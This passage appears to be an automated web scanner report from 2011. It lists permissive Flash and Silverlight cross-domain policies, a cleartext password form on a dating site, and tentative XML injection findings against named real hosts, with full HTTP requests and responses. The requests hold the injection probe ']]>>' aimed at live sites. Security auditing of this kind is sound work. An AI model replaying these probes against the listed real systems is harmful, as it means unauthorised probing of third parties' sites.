<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="www.supersavvyme.com" />
<allow-access-from domain="*.intuit.com" />
<allow-access-from domain="www.dim.fr" />
<allow-access-from domain="*.dim-privileges.com" />
<allow-access-from domain="*.konbini.com" />
<allow-access-from domain="*.loomisdev.com" />
<allow-access-from domain="*.loomisgroup.com" />
...[SNIP]...

6.37. http://www.kqzyfj.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.kqzyfj.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.kqzyfj.com

Response

HTTP/1.0 200 OK
Server: Resin/3.1.8
Content-Type: text/xml
Date: Sun, 24 Apr 2011 03:25:32 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="www.supersavvyme.com" />
<allow-access-from domain="*.intuit.com" />
<allow-access-from domain="www.dim.fr" />
<allow-access-from domain="*.dim-privileges.com" />
<allow-access-from domain="*.konbini.com" />
<allow-access-from domain="*.loomisdev.com" />
<allow-access-from domain="*.loomisgroup.com" />
...[SNIP]...

6.38. http://www.securepaynet.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.securepaynet.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.securepaynet.net

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sun, 24 Apr 2011 12:43:21 GMT
Connection: close
Content-Length: 155

<?xml version="1.0"?><cross-domain-policy><allow-access-from domain="*.wsimg.com" /><allow-access-from domain="*.securepaynet.net" /></cross-domain-policy>

6.39. http://www.tqlkg.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tqlkg.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.tqlkg.com

Response

HTTP/1.0 200 OK
Server: Resin/3.1.8
Content-Type: text/xml
Date: Sun, 24 Apr 2011 04:09:52 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="www.supersavvyme.com" />
<allow-access-from domain="*.intuit.com" />
<allow-access-from domain="www.dim.fr" />
<allow-access-from domain="*.dim-privileges.com" />
<allow-access-from domain="*.konbini.com" />
<allow-access-from domain="*.loomisdev.com" />
<allow-access-from domain="*.loomisgroup.com" />
...[SNIP]...

6.40. http://media.compete.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.compete.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: media.compete.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 29 Mar 2011 18:08:23 GMT
ETag: "b8c48-20c-f226f3c0"
Accept-Ranges: bytes
Content-Length: 524
Content-Type: application/xml; charset=utf-8
Date: Sun, 24 Apr 2011 12:45:09 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>

...[SNIP]...
<allow-access-from domain="compete.com" />
<allow-access-from domain="stg.compete.com" />
<allow-access-from domain="www.compete.com" />
<allow-access-from domain="stg.www.compete.com" />
...[SNIP]...
<allow-access-from domain="stg.media.compete.com" />
...[SNIP]...

7. Silverlight cross-domain policy  previous  next
There are 11 instances of this issue:

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


7.1. http://ad.doubleclick.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Wed, 21 May 2008 19:54:04 GMT
Date: Sun, 24 Apr 2011 04:08:23 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

7.2. http://analytic.hotelclub.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytic.hotelclub.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: analytic.hotelclub.com

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:09:52 GMT
Server: Omniture DC/2.0.0
xserver: www121
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

7.3. http://b.scorecardresearch.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT
Content-Type: application/xml
Expires: Mon, 25 Apr 2011 12:29:52 GMT
Date: Sun, 24 Apr 2011 12:29:52 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...

7.4. http://b.voicefive.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.voicefive.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.voicefive.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT
Content-Type: application/xml
Expires: Mon, 25 Apr 2011 12:09:49 GMT
Date: Sun, 24 Apr 2011 12:09:49 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...

7.5. http://clk.atdmt.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://clk.atdmt.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: clk.atdmt.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/xml
Last-Modified: Fri, 28 Mar 2008 17:48:18 GMT
Accept-Ranges: bytes
ETag: "9e243e8fb90c81:0"
Date: Sun, 24 Apr 2011 12:33:04 GMT
Connection: close
Content-Length: 312

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

7.6. http://ec.atdmt.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ec.atdmt.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ec.atdmt.com

Response

HTTP/1.0 200 OK
Expires: Sun, 01 May 2011 12:29:09 GMT
Date: Sun, 24 Apr 2011 12:29:09 GMT
Content-Type: text/xml
Content-Length: 312
Allow: GET
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

7.7. http://s0.2mdn.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s0.2mdn.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sun, 24 Apr 2011 00:34:42 GMT
Expires: Thu, 21 Apr 2011 00:33:17 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 43343
Cache-Control: public, max-age=86400

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

7.8. http://spe.atdmt.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://spe.atdmt.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: spe.atdmt.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Content-Length: 312
Allow: GET
Expires: Tue, 26 Apr 2011 00:56:06 GMT
Date: Sun, 24 Apr 2011 12:09:49 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

7.9. http://switch.atdmt.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://switch.atdmt.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: switch.atdmt.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/xml
Last-Modified: Fri, 28 Mar 2008 17:48:18 GMT
Accept-Ranges: bytes
ETag: "9e243e8fb90c81:0"
Date: Sun, 24 Apr 2011 03:16:37 GMT
Connection: close
Content-Length: 312

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

7.10. http://ts1.mm.bing.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ts1.mm.bing.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ts1.mm.bing.net

Response

HTTP/1.0 200 OK
Content-Length: 1766
Content-Type: text/xml
Last-Modified: Tue, 14 Dec 2010 01:03:25 GMT
Date: Sun, 24 Apr 2011 12:43:14 GMT
Connection: close
Cache-Control: public, max-age=3600

<?xml version="1.0" encoding="utf-8"?>
<!-- FD -->
<access-policy>
<cross-domain-access>
<policy>
</policy>
<policy>
<allow-from http-request-headers="*"
...[SNIP]...
<domain uri="http://*.msn.com" />
...[SNIP]...
<domain uri="http://*.microsoft.com" />
...[SNIP]...
<domain uri="http://*.bing4.com" />
...[SNIP]...
<domain uri="http://*.virtualearth.net" />
...[SNIP]...
<domain uri="http://*.virtualearth-int.net" />
...[SNIP]...

7.11. http://ts2.mm.bing.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ts2.mm.bing.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ts2.mm.bing.net

Response

HTTP/1.0 200 OK
Content-Length: 1766
Content-Type: text/xml
Last-Modified: Tue, 14 Dec 2010 01:03:25 GMT
Date: Sun, 24 Apr 2011 12:43:32 GMT
Connection: close
Cache-Control: public, max-age=3600

<?xml version="1.0" encoding="utf-8"?>
<!-- FD -->
<access-policy>
<cross-domain-access>
<policy>
</policy>
<policy>
<allow-from http-request-headers="*"
...[SNIP]...
<domain uri="http://*.msn.com" />
...[SNIP]...
<domain uri="http://*.microsoft.com" />
...[SNIP]...
<domain uri="http://*.bing4.com" />
...[SNIP]...
<domain uri="http://*.virtualearth.net" />
...[SNIP]...
<domain uri="http://*.virtualearth-int.net" />
...[SNIP]...

8. Cleartext submission of password  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dictof.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.

Request

GET / HTTP/1.1
Host: www.dictof.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/pub/banner_728_90_random.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Apr 2011 12:40:08 GMT
Content-Type: text/html;charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: JSESSIONID=9ED7BF71162535497E7BF851F34974FF.w1; Path=/
Set-Cookie: lc=en; Path=/
Set-Cookie: CAMPAIGNE.REFERER_COOKIE=http%3A%2F%2Fkroogy.com%2Fpub%2Fbanner_728_90_random.php; Expires=Fri, 12-May-2079 15:54:15 GMT; Path=/
Set-Cookie: CAMPAIGNE.ENTRY_DATE_COOKIE=1303648808195; Expires=Fri, 12-May-2079 15:54:15 GMT; Path=/
Set-Cookie: CAMPAIGNE.ENTRY_URI_COOKIE=%2F; Expires=Fri, 12-May-2079 15:54:15 GMT; Path=/
Content-Language: en
Content-Length: 34995

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Online dating with w
...[SNIP]...
<div class="LoginIndex"> <form action="/login/" method="post"> <!--<p class="error">
...[SNIP]...
<dd><input name="password" type="password" id="password" value=""/></dd>
...[SNIP]...

9. XML injection  previous  next
There are 11 instances of this issue:

Issue background

XML or SOAP injection vulnerabilities arise when user input is inserted into a server-side XML document or SOAP message in an unsafe way. It may be possible to use XML metacharacters to modify the structure of the resulting XML. Depending on the function in which the XML is used, it may be possible to interfere with the application's logic, to perform unauthorised actions or access sensitive data.

This kind of vulnerability can be difficult to detect and exploit remotely; you should review the application's response, and the purpose which the relevant input performs within the application's functionality, to determine whether it is indeed vulnerable.

Issue remediation

The application should validate or sanitise user input before incorporating it into an XML document or SOAP message. It may be possible to block any input containing XML metacharacters such as < and >. Alternatively, these characters can be replaced with the corresponding entities: &lt; and &gt;.


9.1. http://2byto.com/bluepixel/cnt-gif1x1.php [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://2byto.com
Path:   /bluepixel/cnt-gif1x1.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /bluepixel]]>>/cnt-gif1x1.php?e=1920.1200&d=16&r=http%3A//kroogy.com/pub/banner_728_90_random.php&p=http%3A//www.dictof.com/&t=Online%20dating%20with%20www.dictof.com%20-%20Front%20page HTTP/1.1
Host: 2byto.com
Proxy-Connection: keep-alive
Referer: http://www.dictof.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 12:46:41 GMT
Server: Apache/2.2.11 (Win32) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8i PHP/5.2.9
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1088

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

9.2. http://2byto.com/bluepixel/cnt-gif1x1.php [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://2byto.com
Path:   /bluepixel/cnt-gif1x1.php

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /bluepixel/cnt-gif1x1.php]]>>?e=1920.1200&d=16&r=http%3A//kroogy.com/pub/banner_728_90_random.php&p=http%3A//www.dictof.com/&t=Online%20dating%20with%20www.dictof.com%20-%20Front%20page HTTP/1.1
Host: 2byto.com
Proxy-Connection: keep-alive
Referer: http://www.dictof.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 12:46:56 GMT
Server: Apache/2.2.11 (Win32) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8i PHP/5.2.9
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1088

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

9.3. http://data.whicdn.com/images/1311756/l_1413edbb54e52d34fb98d4b6cecdb8e8_large.jpg [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://data.whicdn.com
Path:   /images/1311756/l_1413edbb54e52d34fb98d4b6cecdb8e8_large.jpg

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /images]]>>/1311756/l_1413edbb54e52d34fb98d4b6cecdb8e8_large.jpg?1263334693 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: data.whicdn.com

Response

HTTP/1.1 404 Not Found
x-amz-request-id: A05988CEAD25925D
x-amz-id-2: KNXvDL6ALp8tjbxLMsX5oKrAVAblkIYeFBI+RsdcyloSRi17MBXClUYs1SCdEdQL
Content-Type: application/xml
Date: Sun, 24 Apr 2011 12:47:57 GMT
Server: ATS/2.1.4-unstable
Age: 0
Proxy-Connection: keep-alive
Content-Length: 328

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Key>images]]&gt;&gt;/1311756/l_1413edbb54e52d34fb98d4b6cecdb8e8_large.jpg</Key>
...[SNIP]...

9.4. http://data.whicdn.com/images/1311756/l_1413edbb54e52d34fb98d4b6cecdb8e8_large.jpg [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://data.whicdn.com
Path:   /images/1311756/l_1413edbb54e52d34fb98d4b6cecdb8e8_large.jpg

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /images/1311756]]>>/l_1413edbb54e52d34fb98d4b6cecdb8e8_large.jpg?1263334693 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: data.whicdn.com

Response

HTTP/1.1 404 Not Found
x-amz-request-id: CD4C25CE6283E9D1
x-amz-id-2: OsaSJ4av7UqC8NO0NRk6wbvSsGo6u6iapaL0YZjakkvS/xMV6uYplOauYQkajPEp
Content-Type: application/xml
Date: Sun, 24 Apr 2011 12:48:04 GMT
Server: ATS/2.1.4-unstable
Age: 0
Proxy-Connection: keep-alive
Content-Length: 328

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Key>images/1311756]]&gt;&gt;/l_1413edbb54e52d34fb98d4b6cecdb8e8_large.jpg</Key>
...[SNIP]...

9.5. http://data.whicdn.com/images/1311756/l_1413edbb54e52d34fb98d4b6cecdb8e8_large.jpg [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://data.whicdn.com
Path:   /images/1311756/l_1413edbb54e52d34fb98d4b6cecdb8e8_large.jpg

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /images/1311756/l_1413edbb54e52d34fb98d4b6cecdb8e8_large.jpg]]>>?1263334693 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: data.whicdn.com

Response

HTTP/1.1 404 Not Found
x-amz-request-id: 71624C2808095279
x-amz-id-2: NMg6cva34xdIFxAV460dMjtNILalvH/SqQRxmXMTJTSkE961cz+kTQyBA0dE+bhA
Content-Type: application/xml
Date: Sun, 24 Apr 2011 12:48:18 GMT
Server: ATS/2.1.4-unstable
Age: 1
Proxy-Connection: keep-alive
Content-Length: 328

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Key>images/1311756/l_1413edbb54e52d34fb98d4b6cecdb8e8_large.jpg]]&gt;&gt;</Key>
...[SNIP]...

9.6. http://delivery.ctasnet.com/adserver/www/delivery/tjs.php [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://delivery.ctasnet.com
Path:   /adserver/www/delivery/tjs.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /adserver]]>>/www/delivery/tjs.php?trackerid=276&append=1&r=96277 HTTP/1.1
Host: delivery.ctasnet.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2182862;type=websi010;cat=homep146;ord=1;num=8709666307549.924?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Sun, 24 Apr 2011 12:10:28 GMT
Server: lighttpd/1.4.26
Connection: close

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
